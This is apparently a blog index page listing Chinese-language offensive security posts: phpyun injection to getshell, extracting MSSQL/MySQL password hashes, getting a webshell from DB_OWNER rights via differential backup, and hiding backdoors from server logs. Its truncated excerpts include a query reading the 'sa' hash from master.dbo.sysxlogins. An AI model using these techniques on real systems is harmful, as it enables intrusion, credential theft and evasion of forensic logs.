-
phpyun人才系统注入,后台getshell
/model/class/action.class.php 603行 function fun_ip_get() { if (getenv("HTTP_CLIENT_IP&qu...
-
获得数据库hash值的方法
mssql hash 获取方法如下: select password from master.dbo.sysxlogins where name=’sa’ mysql hash 获取方法如下: SELECT pa...
-
DB_OWNER权限得到webshell的方法
DB_OWNER权限得到webshell的两点改进: 减少备份文件大小,得到可执行的webshell成功率提高不少 一利用差异备份 加一个参数WITH DIFFERENTIAL declare @a sysname,@s nvarcha...
-
DB_OWNER渗透
0xSec你在转我文章,我草你大爷的,要是你转的我把这句话也转过去 我就当什么没看见 弱弱的DB_OWNER渗透 老规矩拿C段先找注入下手,既然有注入,说明站都有老漏洞 注入点有一个DB的,还有个站ewebeditor直接搞定ewebed...
-
在日志中隐藏自己后门
以前发现的一个技巧性的东西,由于一般的webserver都会记录日志而且在目前的后期后门以及漏洞追踪中主要的证据都是日志,如果有可能让日志变得不可信我们就有可能成功了。访问shell.php,会得到日志:<?phpphpinfo();...
